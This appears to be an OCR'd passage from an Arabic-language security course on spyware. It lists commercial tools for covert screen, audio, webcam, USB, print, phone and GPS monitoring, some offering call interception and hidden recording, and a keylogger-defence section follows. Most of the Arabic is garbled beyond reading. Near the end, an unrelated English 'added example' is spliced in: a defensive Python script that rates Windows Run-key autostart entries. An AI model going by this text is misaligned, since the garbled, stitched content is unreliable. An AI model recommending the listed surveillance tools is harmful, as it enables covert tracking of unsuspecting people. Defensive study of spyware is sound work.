• ^ 4 J<fl^ a\\ 4-$J>l j <J^-^ (j- 0 cJ jll clA^ c — ^J*^ .4_juitjuj| Jc j(g hi 

jIjjc lUjj jl SjLLa J^ c-iL J Ul ^ jajjj jjjj^I J^ cilliL J^j* Child monitoring spyware 

Ls lc L* t jj* jjj^II jl dijjjjVl Jc ^Jijj ^ili da jll jl^Lo t<ja ^UjjJajl) ^ia ^j* ^il! dia jll ujj Lg£ ,^^a3I Jjjj^IVI ^jJ^ 

.Ij^. ^l&j ' jj jjj^II 
Child Monitoring Spyware: Net Nanny Home Suite 

http://www.netnanny.com 

jj£ ^ji^a qa ££J£i\ JiUl ajU^J cill ^uoij <i±*j±ti\ ajU^JI CjIj^I Net Nanny's parental control software 

(j* ^IjIaI] CijjljVI f\ I^LujI c>5 ic Jali^JL till ^ajujJ <^^J (jc ojUc ^ .(_£J^-^ AjulaJl CjUjI^xJIj ^1 J-a^J 

4_*K> ^^a^a J j^i j jajj .cyber bulliesjIM predators ^Wf" .u^ i> ^jj^ Jlj ji>yi 



[Screenshot: Net Nanny Home Suite allows you to track and monitor what your kids are doing on the computer; it allows you to see logs of children's Internet activity and instant messages. The panels shown are the Setting Window and the Filter Window. http://www.netnanny.com]

Child Monitoring Spyware: other tools 

; JjjjuJ! ^ a! > nj ja jli ^j3I (JiUl j>J s j-" oaaSI ^a\^ ^ja ^* j ^Jj Uua 
Aobo Filter for PC available at http://www.aobo-porn-filter.com/ 
CyberSieve available at http://www.softforyou.com 
Child Control available at http://www.salfeld.com 
SentryPC available at http://www.sentrypc.com 
Spytech SentryPC available at http://www.spytech-web.com 
K9 Web Protection available at http://www1.k9webprotection.com/ 
Verity Parental Control Software available at http://www.nchsoftware.com 
Profil Parental Filter available at http://www.graftechnology.com/ 
PC Pandora available at http://www.pcpandora.com/ 
Kidswatch available at http://www.kidswatch.com 



Screen Capturing Spyware 
c^ill jj c> screenshot cjILSI i*j J jj j^ill <j3I j*j t*U ^l^j ^1 jj ^ Screen capturing spyware 

Jqjui^ ^^xJl FTP J' c^JJ^V^ ^J^^ L>^ U^^W-^^ 0 JJ (3^^ CS^ ^-*J>lj-^ o 
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jA\ (jjjUc i (JjjjLJ! JaUij t^jjlLJI djUaxjja Ja£iL Uiajl CiUaSl Jalilll Ij^lS Jaaa ^jjjJ Screen capturing spyware 

^jJaj {Ja*J 11a .^JujLudll ( * J ^>' Q ^ ik) ^aja^U CllS jj| 4<^.*ti JJ jJJx^ll G J£^i gjA'S * lajudJl ^-ajl <£jjua3lj 4_L^1xJ| 

.^aIo jjlc (j-oaoi ^1 <ia^j| ^> jSaE ji^ (stealth mode) 

lifc j(*1j .(Hve)j^ jj;^^ (? * w y L^jV jj jj;^^ ^^Jc ^LqA^JLuiaII ^JaJdjl ,jj,jj*jj jj jJJ<^ AjSIj^ ^jj^.I^LuiaI] (j£-aJ 6£c-gIjjJI £>i& £x» 
^^Ic <J-ac <J£ ^^Ic L_flj*j3l ^Ld^jjoiAll (j£-aJ i— j jj jJAA^li ^glc ^nlaj <J£3 t - it Ual i^L - <jilaJI AjflliuiJ ^l^U jjII 

. C5 £jiaJl CliS jll ^ jj 

Screen Capturing Spyware: SoftActivity TS Monitor 

Source: http://www.softactivity.com 
<jSI j*j t*U . ^vim^ l lU^ J£i cjILSI ^ill j terminal-server sessions SoftActivity TS Monitor 

jl Jjiall ^ j*j (Windows terminal server) J^* >5t ±xA\ ^vim^ l 4_k£>l 

(C;\ l_jj£jj qjI A£jjuj ^^ic I^LuiaII ^ixij La AjSIj^ Ljajl ^ .RDP lI**^ ^^-^-J lS^-^> L>* ^4 

.Ajia alij dil udlaJi (Jj^ i uJ (j^J^a (jc ^.j! j^Jl ,jl,Jcl ^^^ic djljjisull ^^jj jj Uiajl A 3& .(jU-ajVI <^Jjuj ^^5^ ^lx»U^)J 

terminal ^ .u^*^^ u^^j j - ^^ ^^■^j .o^*-^ 3 ^ ci^ **— j ^ ^Sjjuj ls^^ 3 ^^j^J^ ^—^-^ 

.Qi A^LiixM UUi jj^i server monitoring software 
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Screen Capturing Spyware: Other tools 

CjILU ji l$j jjLUt jl tiUikl jj jjax^I <iaj^j| ^ ^joij ^ill jJI Screen capturing spyware 
Screen capturing c> J^^ ^ ciiAJI jj jjj^II j1^j> ^ jjjki j Jill Screenshot 

;^U3I j^j]| ^ spyware 

Desktop Spy available at http://www.spyarsenal.com 

Icy Screen available at http://www.16software.com 

Spector Pro available at http://www.spectorsoft.com 

PC Tattletale available at http://www.pctattletale.com 

Computer Screen Spy Monitor available at http://www.mysuperspy.com 

PC Screen Spy Monitor available at http://ematrixsoft.com 
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Kahlown Screen Spy Monitor available at http://www.lesoftrejion.com 

Guardbay Remote Computer Monitoring Software available at http://www.guardbay.com 

HT Employee Monitor available at http://www.hidetools.com 

Spy Employee Monitor available at http://www.spysw.com 

USB Spyware 

cjUL USB spyware. USB jU^ j j^j^^^ J^- u > in o^ <^W*j* J USB spyware 

# ^£J <j^aLkll jj jjja^l S j^j^J ^^-Sc ^jjjjud^jll ^c-al jj J j^. j (j-a <jjj 

qji USB s j$J JaL& <Jc ji3 USB spyware. USB^VL^sl iaU^ ^ <^ jVl J jk USB spyware Jjt 

^Uaill cJ^-j ^ c ^j3I j &Ia jjc. j (device) 6 j&^l j* ^^aj 
m Lh\\))U\\\ j jj jjj-*£ JU^h USB JU^ c£' u£ ^3 C5^^ ^-^^ J^kj j Jj> > .n j <j^j^ j JalSill £&jjj USB spyware 

St.il IgAxj^Jj (jjjui^jllj jUlkVlj (Jlxill J J^U ^3j£ a 1 ^ *^ l£^J ^ ^ (J^*-^ 2^^^ LS^ 0 J-^^ J 

.1— iLia ^Jjll *\ > <aj3 4 ajhr* 

(J£l 1 - gakla ^gJjj gaflJ J^juj (jlajsu .(j^-V <*-^j ^ <xj*.I ja!3 a L_aL» AIajJaaj USB j^-?" U£ ^VIj^jVI ^Ja's lajjL 

J-a*j 11a .c Lijja^ll jj jjj^ll ^ ^Uaill jjl j-<i ^ !>Ula USB spyware ^^*>nj .^c^JI diL* jlx-a ^ ( . 1<v > ls^\ ^-^W di^^U^ 

. jj^jjll <> Sjj^VI ciiljl^VI fkx* J^xj .spyware J adware V USB spyware 

.s^ 3 uj^ t> ^k o-^ lJ\ USB Sj^i c> ^iLJl ^judij USB spyware 

.(background copies) y?^^ c> c^^^ 6 3 - ) ^' f <^^j^ - 

^Cjlajjlajll j jj jJJ^ jl > J ^ > *aJ ^ USB dh^ ^ jSlall CjljUJl (Jjkj j (Jj^ > >n j (jiajc j Jalajll cill ^jjj 

Source: http://www.everstrike.com 

li^j .CjUjjJajl) j jj jJfa£ ^J^ala USB jW^ L^^ ^3 ^^^^ J^kj j Jj^ > >n j (J^ajC j Jalfijll (j-d <aJ USBSpy 

(Jlsti jjyajj] <Jj3 J^jJj 6 6 j£J>.Vl j\ jl^J>Jl l!^*-^ 2^^^ J^J^ ^5^* cJ-^^ J t^llj^ ajjll ^Uakl ^j^j^j] ^ ^jhr> Stal W^j 

Djjlill <j^»j .^jau^ajll j JjUMl (j^ljc-V <1 j^udj l^jlj J jj^a jll (j£-*j (USB Traffic) USB jjj-^^ ci*^ -uj m1 ^'^ j j^-^^^ j 

j^joiJ CIjVIj^jVI ^JJJ l!*-?^ J ( -— J ^ .Jaflfl AjjUa^ll CjljUJl ^a^5J C _ 5 J^- 



[Figure: USBSpy capture window showing USB bus traffic as a packet list (port, timestamp, transfer type such as BULK and INTERRUPT, direction) and a USB HID descriptor view] 
https://www.facebook.com/tibea2004 




USB Spyware: Other tools 
\JN& J>uJI jAjSaII USB Spyware cjliuks <> 

USB Monitor available at http://www.hhdsoftware.com 

USB Grabber available at http://usbgrabber.sourceforge.net 

USBTrace available at http://www.sysnucleus.com 

USBDeview available at http://www.nirsoft.net 

Advanced USB Port Monitor available at http://www.aggsoft.com 

USB Monitor Pro available at http://www.usb-monitor.com 

USB Activity Monitoring Software available at http://www.datadoctor.org 

Stealth iBot Computer Spy available at http://www.brickhousesecurity.com 

KeyCarbon USB Hardware Keylogger available at http://www.spywaredirect.net 

USB 2GB Keylogger available at http://diij.com 

Audio Spyware 

2-aljj cIujjj . jj jjia^II c>5 ic d jl aji jj^II db^ JaliiilV ^ a - ^ ^^jll d jj^II <jSIj-<J Audio spyware 

^JjJ AlLaL^a <LjlaJ jj jJJ^ll ^gic d (jnm^l duJJJ ^jj . jj jjja^l ^AaJLaLd (j-a ^jil ^^ic J jj^^JI <jj,J jj jjja^l (Jjjjuo^jII 

^) ( . lUaJJ V d jj^II (jjjjoi^J £^J^ ^sl ^Vlml .IjJ^J jJJ^^I dl jj^VI t frV^ a (Jja > >nl AjalaJl (JasUj ^^JjoiaII J^*-*^] cJ^jj 

.AJjb] dl jblal 

^Jc. a L_alxi 4_L^jab<J! dl jj^VI Jaia. ^jj . jj jji^ll ^^^ic dl jj^VI a^- jjj-s a J^joijj Ajl-sjj Audio spyware 

^£j^j13 £>i& d jj^II (jjJjai^J jj I j^>lklujJ (jjjLjall ^Ixj^JjoiaII jl (jjy^ig-xJl <jl£ c^Ulbj .(j^V dlSj ^bjloj^l! C5 i^xJl (j^ajUl 

,4jjjoj dLa jl*-* ^^^ic ^^Ij t^^^liVI <*-^lj dUJl^xJlj ^ a all d^Lj^> aJ .Jj^jj 

jj jj* dl3 <juj^j^3I dlkniaj < alia o Ajj jj^II <juj^j^3l JjLojj ^^ic ^jjjjoi^jIIj (Jj^ i all I ^^ic j^la Audio spyware 

I jl^aljJJ (j-a Aijst-d j (JliJaVI jl 1 (gj^h d^aLuLq (JjjUU (j^J d jj^all (J»imi^1 

^j£x»j .<U ^1 ^ fljl j^JI j tdU jj£j-<JI t JjojjII c aliai ^ Jla Aj^Sjl! d jj^JI 6 j^l <j5I j-<J Ig^hviml (j^j Audio spyware 

^j^jll ^ajujj Igil ^Jl t<jj ^j]| JjLojjIIj t j ingoing Sj^U-JI dUJl£-<JI <jSIj>»j di> ^ull (Jjjia (jc jj^II dlij^L^JI Jj^juij 

.GPRSo 3 ) J <j(r? <jr> £f" J 'dUllUl ^.lA^ Jjt> , uj ^SMS J^ 'd jj^JI <jal jx» j 6<±aJl ^lliLal! 

Audio Spyware: Spy Voice Recorder 

Source: http://www.mysuperspy.com 
^likj i _^Llaj3l ^^Jc. d jj^II Jj^joajj d jj^II -i^ji ^ ^.auij c5^^ j^ jj;^^ (jjjjoi^j* ^cxiljjj Spy Voice Recorder 

dlajjJaj * alia o ^1 jjl <il3i Lftj <jj« mi dli 4_jjjill <JjLujj3I ^x»Ijj jl <j^Ij^a3I ^l jj ^ jja^JI dijjjjVI <juj^j^3I dlj^La^ 

'Yahoo! Messenger Voice chat 'Skype Voice Chat 'MSN Voice Chat ^j^V^ <^^l Ajjj^JI cjj^UVI 

dljj^al j ^^Iloj^JI c_lxJ j tdlj jjjVI ^ ^ J^VI AialLal! dl jj^aVI Jj^J UiaJl .^Jl Fo/c^ CA^ 6 /C^ Fo/c^ CA^ 

,^cll tdlcLojudli j jj^j^ll 



[Figure: Spy Voice Recorder window (File, Option, About) with recording timer, Save Path field, options AutoStart, Hide Tray Icon, Hide Install Path, Record with Program Startup, Save Files every N minutes, Auto Record Task Management (Auto Record When Skype / QQ / Yahoo! Messenger / Voice Chat Room Voice Chat Activate) and Hotkey Setting (Default Hotkey Ctrl + Alt + R)] 
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Audio Spyware: Sound Snooper 

Source: http://www.sound-snooper.com 
eli^j Cj jj^II Jj> > >n I^jj .^Uaill ^^ic djl jj^VI cj^Li^ > >n j tdj j-aj ^.<u.uj ^^31 (j»imVi ^c^U^j j& Sound Snooper 

CjliLJ! ^jc ojUc Cljlaa^ ^jjj^IVI ^O^t cJjIjujj lS-^J^ 5 j^^l dAiLa ji\ ^ ^1 ^ Cj jj^JI dAiLa ^J^^jj ^AxILa Cj 



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[Figure: Sound Snooper main window (File, Options, Help) showing the selected device "SB Live! Wave Device", a Voice level meter and a Pause button] 
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Video Spyware 



q\ (j^j j J ^ j^-^ iaUij <J£ <Jj^ > uj cilj£ ^ j t^cxilj^)JI 11a , jj^iill Video spyware 

CjI gj/nti l!^*^ ci^-l cl>^ J' ^UailL (JL^jV! (JJ<q1 g ^ajujJ jJ-l}s3! (jjjjai^j Asu (jc <J jj^ jll ojjLd .Ijjoj ^^liiil 





[Figure: video spyware relaying webcam video from the User's computer to the Hacker] 



Video Spyware: Webcam Recorder 

Source: http://webcamrecorder.com 

^jj^aldH Jaxj c _^j3I cjI jj^I^II (JiLo 5jujLuJI *(^* i£\ <Sy> y ^ ^ l^^^ j j^A^^ <jal^<J ^U^j Webcani Recorder 

_C_u£^J| ^Imi ^^Jc. L_lt*-I! j 6L_J JJJjJ J^'-^^ ^ LS *W J ' 4_jujJjA3l dilj^L^i (ciL ^aLkll 



[Figure: Webcam Recorder screenshot, http://webcamrecorder.com] 



Video Spyware: other tools 

;^JU3| ja^ll Jc Q^\jt>^\ b^l ^Ld^JjauJl jJ-liill (jjJjud^J L>* C-H 3 *^ J .^J^ > ^ 

WebcamMagic available at http://www.robomagic.com 
MyWebcam Broadcaster available at http://www.eyespyfx.com 
Digi-Watcher available at http://www.digi-watcher.com 
NET Video Spy available at http://www.sarbash.com 

Eyeline Video Surveillance Software available at http://www.nchsoftware.com 
Capturix VideoSpy available at http://www.capturix.com 
WebCam Looker available at http://felenasoft.com 
Security Spy available at http://www.bensoftware.com 
iSpy available at http://www.ispyconnect.com 

Print Spyware 



jJjL£l3! JLojjV Web foriliat lS^ 1 ^al 3 qVl^ ^ Jl£j^j| J ci^^ J^J^ Jj> > >nj J^J <clik3l (jnm^l 

JUi J^ jl c^j jSjVI j\ C±i j^V! J^k ^jjjilVI ajjJ! 
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. 

[Figure: print spyware between the User, the Print Server and its Spool, the Printer and the Attacker] 



Print Spyware: Printer Activity Monitor 



Source: http://www.redline-software.com 
^l^kiojl aJs\ ^1^*11 JjS c> W^* 1 *^ (4j yr^ a^USJI u^ 1 ^ £*Lh i> ^ Printer Activity Monitor 

:Printer Activity Monitor c> ^ aJWI *L^Vl J*£> j^-W^ 

_<C.Ulal| ^l^i <a^j . l 

CjSj ^ CjlsuUall *&J^ ^I^Cl -l^J .2 



[Figure: Printer Activity Monitor screenshot listing monitored printers and print jobs] 



<sulla3l ^I^JjujI J j^. CjU» jlxxi ^^Ic <J 1] Ajullall ^jjjjlu^j <suUa3l CjlkifLlill ^I^JjujI Uiajl ^ aJ ^jj-^l^ll 

^il! dlS jllj ^tJjljj ^ jflaxJl J^^ J*^ * <-&a ^ tall f \ l^Loai ^fiiJ ^ia^I^xJI ^cLoij djlkiflajll I^A ,c fl^JI 

(_>iasu ^^Jj J^)^- tAc-lJalt 4Jia^ijjaj| 

Print Monitor Pro available at http://www.spyarsenal.com 
Accurate Printer Monitor available at http://www.aggsoft.com 
Print Censor Professional available at http://usefulsoft.com 
All- Spy Print available at http://www.all-spy.com 
O&K Print Watch available at http://www.prnwatch.com 
Print Job Monitor available at http://www.imonitorsoft.com 
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PrintTrak available at http://www.lygil.com 

Printer Admin - Copier Tracking System available at http://www.printeradmin.com 
Print Inspector available at http://www.softperfect.com 
Print365 available at http://krawasoft.com 

Telephone/Cell Phone Spyware 

4i! Cilia _4_i^jJa3! jlaJl L_fljl^Jl/L_fljlA (J-al^ll <J jj^ jll LaJ CllLia ^j; SIjI j& ji^Ji L_fljl^Jl/L_fljl^Jl Jc ^jjuui^jll 

(JjLui^llj dljjljVI ^1 laJLujj <JiLa L_fljlg_ll C5 ic JaLuU lOgj (Jj? ' ^ dilllllajH £>aA ^a j£j / fljlfrll ~ I^ILu^q (jC LaLaJ <juiij ^ajli 

^laaJLuil ■J-^^ dilllllajH oaA ~1 I^JLujI ^aJJ 66jlc .JjjJ^lVI * J J 1 "** a ^ (J^-^^ ^llj (j-a CjLg jlst-<Jl £>i& Jc J jj^aJl 

.(s^jlj Sj^U-all cjUJUJI aK (call history) cJ^- lsj^ - Call History 

L^ia. jll t5 ja. JjLuijII Jc- ^^UaVI clA^ .oj^U-all j ft^jl jll Ajj^aill JjLuijII s^aLLq ^ cilj£ *j - View Text Messages 

. J^uoj jjj^j c^L Jl l $W>un ^jjujj lJI^JI J^U. I^j jUj duj Jll ^Sl jJI £i*aJ J*t£ J^uoj - Web Site History 

J^laJl t fljlfrll ja (jC Ij^aJl iilllA -C5 lliaJl CjS jll c fljl^Ji (jj^J (jnmV^I ^cxil till J^-laJ L_fl jjuj - GPS Tracking 



^UJl ^xujjJI ^ (jxua jA La£ J^xj CjUjjMII dift 




[Figure: cell phone spyware path from the User's phone over the Transmission Tower and Satellite to the Hacker] 



Cellphone Spyware: Mobile Spy 

http://www.phonespysoftware.com 
iiiiii J| ^Ii^j .< J L_fljl^JI <Jajaij| cJj? ' ^i^^ii C5^J J Jc (jjum^jll M^obilc Spy 

ajll J^juJ lA jj^J djUill L-ljoia 

jjj^II Jj? ' "*^J ^1 J-^l ^aUaj ^JJJj t^al Aj^jj t4jC.Ldla.VI ^a^lc-VI cJ^^J ^-^^J-^J ^J 1 gaill <JjLuj^)3I (Jja i (JJ^^l & aW ^luiI 
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Telephone/Cell Phone Spyware: other tools 
c fljlgj) Jc iaUij J£ Jj-> > >nl ^ jliJI t fljl^J) /c fljl^Ji Jc ^jjjjud^jll aJUII ^1 jJI ^hviml Uiajl ^ 'Mobile Spy 

VRS Recording System available at http://www.nch.com.au 
Modem Spy available at http://www.modemspy.com 
Mobistealth Cell Phone Spy available at http://www.mobistealth.com 
SPYPhone GOLD available at http://spyera.com 
SpyPhoneTap available at http://www.spyphonetap.com 
FlexiSPY OMNI available at http://www.flexispy.com 
SpyBubble available at http://www.spybubble.com 
MOBILE SPY available at http://www.mobile-spy.com 
StealthGenie available at http://www.stealthgenie.com 

GPS Spyware 

jl (j ^ ui jl SjLloJI j>» ij i^j] (GPS) c^^-*-^ ^ f laJLujj Jilj daLi^ ^j; (j^flaj j\ jl^a. j& GPS spyware 

^Vlm^l S^aLuLa dJ ^aJ ^.h <^l jjJ^lVl ^^^l (jl IgJb n jl j <J^joi L_flLi J lifc (jJ^^J jl hq^> j L_fljlg_ll ^jl^-Q Jallj £JJJ 

Jc c fljlgJl (jl£* (jc jasu jll j t V^U ^l^alall A ]~A\\\ jj! (J^ajC j ^11 J jjj£3VI (jl j^C Jl J j^Jl (jJ Ja (jc L_fl^Jl 

; JU3I <J£juo3l J jA ^il j-<JI aj^j (Jjjjo^j 






[Figure: GPS spyware reporting a Vehicle's position through a Transmission Tower] 
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GPS Spyware: SPYPhone 

Source: http://spyera.com 

^1 j (jjjia cjc ciL (j-aUJI c_jLo^J L-fl^lud^li J j^^ l c fljl^il GPS J^j^ cs^' GPS (j^'o" SPYPhone 
Spyera Spyphone Au 3 ^1 J^^Jl cil^JI ^ ^UjJI b& c^ii ^liaJ . SMSj' lA j' gr? yr> <3G 

(jjj^j A'&a) Jj B t*L (j-aUJ! L-JJjIt L-jLuo^ Jkb iSaJjiJl c^ili J CjLSI^I jLg-k»V ^Sl jxll ^j^j] GPS f^V: 

I^UjJI bfc ^bVimU p.Uj£Vl J*i til&aJ 

.t*Sja^ll t_fl^JI Jjj 2ujIS1I 4_l^3I JjLujjII s^IjS 

. J j-<^a3I c V^ll ^jojI jjKll ^L)^ 



Features 

- Call interception 
- Location tracking 
- Read SMS messages 
- See call history 
- See contact list 
- Read messenger chat 
- Cell ID tracking 
- Web history 

http://spyera.com 



GPS Spyware: other tools 

EasyGPS available at http://www.easygps.com 

FlexiSPY PRO-X available at http://www.flexispy.com 

GPS TrackMaker Professional available at http://www.trackmaker.com 

MOBILE SPY available at http://www.mobile-spy.com 

World-Tracker available at http://www.world-tracker.com 

ALL-in-ONE Spy available at http://www.thespyphone.com 

Trackstick available at http://www.trackstick.com 

Mobistealth Pro available at http://www.mobistealth.com 

mSpy available at http://ar.mspy.com 
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How to Defend Against Keyloggers 



^Jjli-Q <Ja. j] Jc \ frljtj£ ^aJJ ^31 JJJ^ c — ^ ^ ^ ^ ^f^"^ ^—^J^ ^J^> cJ> ujJj laSjL (^iH J^JllaJ j& jj^> J^^l 

4j]j|jx» jl ;L_flJJa. jl 6J jlixJl diljUJl fijlxlail (JIg ^jLaaVI ^Ijj*JjujVI J^> jK CA Ja ^j; jJjIaJ S-ljJ C5 JoaJJji : l L-flJ^Jl a JJ j-Ua^II 

<jj^J| 4jjjjoi JiLd 4lilla (_£j^j ^jlal jC«V (jjA^lg^Jl 1 g a iklLaLj ttillj J^*^ J." ^aUaj (J^Luua aJa ujJ j 4(JlilaVlj (j^a J^l 

JJC. <J ji*J Jc <J jj^aJlj t^jj^-all L_jLud^Jlj L_flj*l j^Jl ^aUjjIj (jLajjVI CjlaUaJ Jc <J jj^aJlj 6 JjuJI t ** & JJ > n£j j t^iila j>Jl 
JjjUl (j-G JjliS JJC (ilU^a t^aUajll Jc a Igil Cilia jj^> jl£ ^ J^J CP" L L-Jxj all 4il (^J^ Cjr^ -^J^ ^ J 1 ^ " 

; jj*. jl£ AJa ^lajll 

^jfc <_£j^.VI AjJiaJl lLjLi^jjII j Jjfi\ J tCjLuo jJjiJl (jl Cilia .(jnui^Ml 4 «s 9l ^ a ^c^l jjj CjLuj Jjjill 4-ajl£x £^al J^ C-UJJJ 

lia JjVI ^lijll (jjumauH ^al^xij CjLujjjjiill a jli jt$j> jj?> jl^l ^j. 1 W^-^ C5^J ^ ' " J 

4jail^<> £tx»ljJ <Jj3 (j-d <jc t *a.*<U ^jj ^j]| jja> jii^ll tCjjjjjVI aSliA C5 ic 4 aAld ja> jK ' ojU>V^ ClalAnJaj ^Ijjajjuil a jj^. jl£ 

# jj jjj^II (j>i Aii^. (j^j CjLajjjjill 
. ciiifii lI^xjj o- 3 ^ ^^-^^ j ^-^j ls^j 'host-based IDS 

jj jjf^ll j (Jj J y** J\ ^ (Firewall) Cj\ . j^^^ ^(Firewall) 4jI^JI 

.^i^Ji ^i <ia ud^si l_jL» j1x-<ji jiijji ^-j-^ ^j^i uU' 1 ^ 

Cjljla ^^jII L-jIjjajII c_jaljjj jj£Lg cJ^^ U*^^ (^1 (>< ^ ^J.^ ^l^aJLmt . jj jJJ^^ll jl$J> (^£> l^lj* ujj ^jj ^^jll ^c>»l jill ^jjj 

.4jqKll ^ JjiJiill Jj-dJ jj^. jli^ .A£fJa3l jl ^Uaill (^Sc 

jild i4lx*a ^jjILJI jl dj^bl^ I (j^aull (JjJaLj 4jjj ^ 4_Ldl ciL <jL^aLaJl S j^J>.VI 4_xJaj| ^^ic JaliaJl 

„ jK ^xiljJ i^n/nl \^ (j^-ftJ ^^31 PS2 jjj^ll l_jIxJI j ^USB 

jjjJI (JjLuj j tj* v^ .. n (jj^l^JI fkx* (phishing emails) <J^VI ^jjjUVI jjjJI Jj^- j ^ ^ ^>*^^ 

.l^jlia^j ^ jJI jj£ ^jjjUVI jjjJI JjL-j ^ia ^jUjj pop-up blockers - 

process J registry editor ^I^IujIj jjjjj^I Jl^ ^ I^Iijjj !^ ^jULJI o»ai .1 ^ nin jl JjS ^1 jA\ ^ 

m Q u^^\\A \ (> c^^ciil explorer 
. jj* jjj-^31 J^-^ CD/DVD j> ^ C5 ^> c^jV USB ^■^nnl 

(virtual keyboard) Aj^J^ jjjUaII jl (automatic form-filling programs) y^^l ^i><u3l ^J>» j^Ijj ^l^l^l 

Jjjj* L_fl jjuj Ujtfllj* ^-j j>u3l ^J-d ^<»ljJ . j^>^ cJ^-^- (j -0 lP 3 ^*^ ( ; li^J I^jV JJJ-^I jLaKj ^Lq laJL >ia!I s-LgjujI JljkjV 
(j-d JjuJI Cjl j (JUujVI dilaUaJ ^al3jl ^J^l jl t^J^Jl J <^lj 4_j^LaJl Ajj^kjaJl (Jj > ^->1 9j1I 4_jIj£ ^IjjkjjoaV (jiajxjll 

,^jjILJI djLa jl 

.jcjjUx 4_ki_jja J£ ^ ajjIjjUI j^VI ^ jjj c^illj ^ (keystroke interference)^^^ ^1 ^I^IujI 
J J^^V (Windows on-screen keyboard accessibility) u^-*-*^ ^jliJI <^j3 Sj^LolJI sbi ^Ijjkl^l 

JiLd CjUi jls«-<i (_^l JljkjV (Jjj jUJl ^aljjkjjajl ^aJJ IjA <iV ^ 4_j^ljaJl CjLd jIslaII ^JJjuJ ^^^Jc JaliiJl cilj^QJ .(_^J^.I ^JJ^ djLd jls^ (_^l 
.^CJjlLJl <Ja. jl ^aljjklajlj JjoJI CjIaK <jIj£ (j^ ^JJ ^tJjlLJl <Ja.j3 ^ ^Jl 6(jLajjVl CjlaUaJ ^ISjl J 6 JjuJ! diUiK 

,AjjjjaJI ^il j-<JI till jjjoij ji (^jII <a jiubftll jl l^ja l_j jc. j^ll jjc. ^1 jjj^IVI ^j^l lS^^j (jg& c_j!>L^ j ^^ic jiii I 

JjJa 4_jU^J3 ojLjaxJl jjjIjjII (jjjfjljj L_fl jjuj ^jVI ^1 . jj^' J^£^ diLia ^j; jjJa AjLa^JI jj3 jj3 a jjklLujJ (^5^ Oj^ 1 ^^ 6jUia-<Jl jjjIjjII 

^aJJ -Lg jjl^Jl CjS jll ^ JJ jJJ^ll ^JjlLd <Ja. jl ^^ic 1 ^jjlj£ ^aJJ <JaijJa <J£ (J^ ujJ ^ill jl^-aJl jA jj^- J^^l ^j^-l . jjf J^^^ 6 
(jjjJl (jj-^l^xJl (jC ^LjaS <C jjjauJl Cljlllllaj£ jC. jK ^aljjkjjojl ^aJJ ,^JjlLJl <Ja. jl j JJ jJJ^ll 3Jlja. ^JJJ Li <jl£-<J! ^ jl^-aJl IjA jJ 
tiL (j-aLaJl ^aUajll (jC ^lijll .Ij^. ^alA j q fljlgJl ^ISjl j <j3j> ^i^ll CjUI uiaJl ^ISjl j JjuJI diUiK A^Jjoj (JIq <CjLk ^jialjC-V l& j^JJaJjaiJ 

;^JU3| jaull ^^Jc. 4_a.jj>Jl CjljLjaxJl ^jjj 4 jj^. jl£ -Vj^a 

,4_jajljujJaJl JJ jJJx^ll A Jxill cJ J^l 1 

,^JjlLj| <Ja. jl ^ (S b > ^ 4 Jfll > >il CjU j£a J j^. j ^aJC ^jUijJa] ^JjlLJl <Ja. jl 4-g^.l jl L^JJ^ (J 1 ^^^ 

.^ajUJl 4ij6 Jia 




_a^J (Jj^alLd jl^-^ (^1 iill^A tit La (jjaalt j JJ j-Ua^lt Sj^aI (J^3 ^£jj^ j-a^3 
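The defensive list above tells the reader to inspect the system with the registry editor and a process explorer for programs that start without their knowledge. The following is an added example written from that defender's view; it is not the page's own procedure and not any product's code. It parses a constructed `reg query` listing of the HKCU Run key (the sample entries, user name and paths are all made up for the example) and triages each autostart entry: a binary named like a Windows system process but living outside C:\Windows, or anything launched from a Temp directory, is rated "high"; entries under AppData are rated "review" because legitimate user-installed software also lives there; the rest are "ok".

```python
"""Triage of Windows Run-key autostart entries (added example, constructed data)."""
import re

# Constructed text in the shape that `reg query "HKCU\...\Run"` prints.
# Names, paths and the user "ralf" are invented for this example.
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\ralf\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SunJavaUpdateSched    REG_SZ    "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
    svchost    REG_SZ    C:\Users\ralf\AppData\Local\Temp\svchost.exe
    Updater    REG_SZ    "C:\Users\ralf\AppData\Roaming\updtr\update.exe" -silent
"""

# Names of genuine Windows system binaries; a copy of one of these outside
# C:\Windows is a classic disguise for a keylogger or other spyware.
SYSTEM_NAMES = {
    "svchost.exe", "winlogon.exe", "csrss.exe", "lsass.exe",
    "smss.exe", "wininit.exe", "explorer.exe",
}

ENTRY_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$", re.M)


def parse_run_entries(text):
    """Return (name, reg_type, command) tuples for each value line."""
    return [m.groups() for m in ENTRY_RE.finditer(text)]


def image_path(command):
    """Extract the executable path from a Run-key command string.

    Quoted paths are taken up to the closing quote; unquoted commands are
    split at the first blank, so an unquoted path containing spaces would be
    truncated (a limitation worth knowing when reading real Run keys).
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def classify(path):
    """Rate one autostart image path: "high", "review" or "ok"."""
    lowered = path.lower()
    base = lowered.rsplit("\\", 1)[-1]
    if base in SYSTEM_NAMES and not lowered.startswith("c:\\windows\\"):
        return "high"          # system-binary name in a non-system location
    if "\\temp\\" in lowered:
        return "high"          # persistence from a temporary directory
    if "\\appdata\\" in lowered:
        return "review"        # user-writable, but also used by legitimate apps
    return "ok"


def triage(reg_output):
    """Map each Run-key value name to its severity rating."""
    return {name: classify(image_path(cmd))
            for name, _reg_type, cmd in parse_run_entries(reg_output)}


if __name__ == "__main__":
    for name, severity in triage(SAMPLE_REG_OUTPUT).items():
        print(f"{severity:6s}  {name}")
```

Run on a real host, the input would come from `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"` (and the HKLM key, which the example does not list); the rating only orders what to look at first, and a "review" entry still needs the publisher signature and the process tree checked before it is dismissed.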



Anti-Keyloggers 
anti-keystroke loggers c^^j 6 (Anti-Keyloggers) 

CjLJalalt (j* ^jAxJt . jj*> jl£ CjLi^gjj <jc t L!a£lt jlajsJ \ > ^> J> ^ jj*> jl£ dlbLja* t"u<<u^i , (keystroke lOgger)^^*^ <JjjJa 

(Anti-Keyloggers) I jp^'^j ^tjaVt ^^it AiLjaVU tCijjjjVt jjc- L_jUJVt CjI^jJj CjlcLL^altj t^JLJt cjLauaj^Altj tSju^lt 

